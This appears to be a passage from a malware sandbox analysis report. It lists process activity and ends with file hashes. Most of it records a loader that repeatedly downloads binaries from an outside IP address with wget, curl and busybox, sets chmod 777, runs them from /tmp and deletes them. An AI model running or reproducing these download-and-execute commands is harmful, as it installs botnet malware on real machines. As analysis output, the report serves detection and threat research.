/bin/rmrm Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵PID:920
-
/usr/bin/wgetwget http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵PID:921
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵PID:923
-
/bin/chmodchmod 777 tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵
- File and Directory Permissions Modification
PID:924 -
/tmp/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS./tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵
- Executes dropped EXE
PID:925 -
/bin/rmrm tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵PID:926
-
/usr/bin/wgetwget http://216.126.231.240/bins/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵PID:927
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:928 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵PID:929
-
/bin/chmodchmod 777 S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵
- File and Directory Permissions Modification
PID:930 -
/tmp/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx./S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵
- Executes dropped EXE
PID:931 -
/bin/rmrm S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵PID:932
-
/usr/bin/wgetwget http://216.126.231.240/bins/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵PID:933
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:934 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵PID:935
-
/bin/chmodchmod 777 NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵
- File and Directory Permissions Modification
PID:936 -
/tmp/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr./NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵
- Executes dropped EXE
PID:937 -
/bin/rmrm NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵PID:938
-
/usr/bin/wgetwget http://216.126.231.240/bins/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵PID:939
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:940 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵PID:941
-
/bin/chmodchmod 777 oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵
- File and Directory Permissions Modification
PID:942 -
/tmp/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N./oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵
- Executes dropped EXE
PID:943 -
/bin/rmrm oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵PID:944
-
/usr/bin/wgetwget http://216.126.231.240/bins/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵PID:945
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:946 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵PID:947
-
/bin/chmodchmod 777 MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵
- File and Directory Permissions Modification
PID:948 -
/tmp/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO./MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵
- Executes dropped EXE
PID:949 -
/bin/rmrm MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵PID:950
-
/usr/bin/wgetwget http://216.126.231.240/bins/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵PID:951
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:952 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵PID:953
-
/bin/chmodchmod 777 uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵
- File and Directory Permissions Modification
PID:954 -
/tmp/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs./uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵
- Executes dropped EXE
PID:955 -
/bin/rmrm uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵PID:956
-
/usr/bin/wgetwget http://216.126.231.240/bins/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵PID:957
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:958 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵PID:959
-
/bin/chmodchmod 777 4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵
- File and Directory Permissions Modification
PID:960 -
/tmp/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ./4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵
- Executes dropped EXE
PID:961 -
/bin/rmrm 4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵PID:962
-
/usr/bin/wgetwget http://216.126.231.240/bins/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵PID:963
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:964 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵PID:965
-
/bin/chmodchmod 777 Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵
- File and Directory Permissions Modification
PID:966 -
/tmp/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p./Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵
- Executes dropped EXE
PID:967 -
/bin/rmrm Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵PID:968
-
/usr/bin/wgetwget http://216.126.231.240/bins/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵PID:969
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:970 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵PID:971
-
/bin/chmodchmod 777 pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵
- File and Directory Permissions Modification
PID:972 -
/tmp/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5./pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵
- Executes dropped EXE
PID:973 -
/bin/rmrm pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵PID:974
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97